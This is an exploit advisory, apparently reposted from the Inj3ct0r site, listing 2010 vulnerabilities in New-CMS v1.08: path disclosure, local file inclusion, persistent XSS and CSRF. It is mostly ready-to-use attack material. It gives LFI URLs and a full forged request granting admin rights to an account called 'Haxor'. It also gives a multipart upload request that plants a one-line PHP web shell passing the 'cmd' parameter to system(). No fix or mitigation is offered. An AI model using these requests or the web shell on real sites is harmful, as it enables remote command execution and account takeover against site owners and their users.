New-CMS v1.08 Multiple Vulnerability
Posted on 30 April 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>New-CMS v1.08 Multiple Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================== New-CMS v1.08 Multiple Vulnerability ==================================== # [Vendor SW]: New-CMS # [Version]: 1.08 (but possible all versions) # [Vendor URL]: www.new-cms.org # [Tested on]: Ubuntu Server 9.10 # [Category]: Webapps/0day # # [Date]: 17 Feb 2010 # [Author]: Alberto "fulgur" Fontanella # [Author URL]: ictsec.wordpress.com # [Author EMAIL]: itsicurezza<0x40>yahoo.it # # [ 1 ] - [ Full Path Disclosure ] http://[host]/struttura/ricerca.php http://[host]/pdf.php http://[host]/index.php?lng=it&pg=manager ...etc Fatal error: Call to undefined function ListaFile() in /var/www/struttura/ricerca.php on line 8 [ 2 ] - [ Local File Inclusion ] http://[host]/index.php?pg=cmd You have to put cmd.php in /struttura/ http://[host]/pdf.php?lng=cmd.php http://[host]/newcms/struttura/manager.php?lng=cmd.php http://[host]/newcms/struttura/editor/quote.php?lng=cmd.php ...etc You have to put cmd.php.str in /lingue/ [ 3 ] - [ Persistent XSS ] Write an Article/News and Put in the Title field: "> [ 4 ] - [ XSRF ] To give privileges to an User Account: POST /index.php?lng=it&pg=admin&s=redattori HTTP/1.1 Host: [host] Keep-Alive: 300 Connection: keep-alive Referer: http://[host]/index.php?lng=it&pg=admin&s=redattori Content-Type: application/x-www-form-urlencoded Content-Length: 64 azione=new&add_red=Haxor&opt1=on&opt2=on&opt3=on&opt4=on&opt5=on To upload a PHP Shell: POST /struttura/manager.php?lng=it&upload=ok&id=indirizzo_0 HTTP/1.1 Host: [host] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://[host]/struttura/manager.php?lng=it&id=indirizzo_0 Content-Type: multipart/form-data; boundary=---------------------------213917452311081853951240913053 Content-Length: 424 -----------------------------213917452311081853951240913053 Content-Disposition: form-data; name="radice" Content-Disposition: form-data; name="per" -----------------------------213917452311081853951240913053 Content-Disposition: form-data; name="file"; filename="cmd9.php" Content-Type: application/x-httpd-php <?php system($_GET['cmd']); ?> -----------------------------213917452311081853951240913053-- # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-30]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
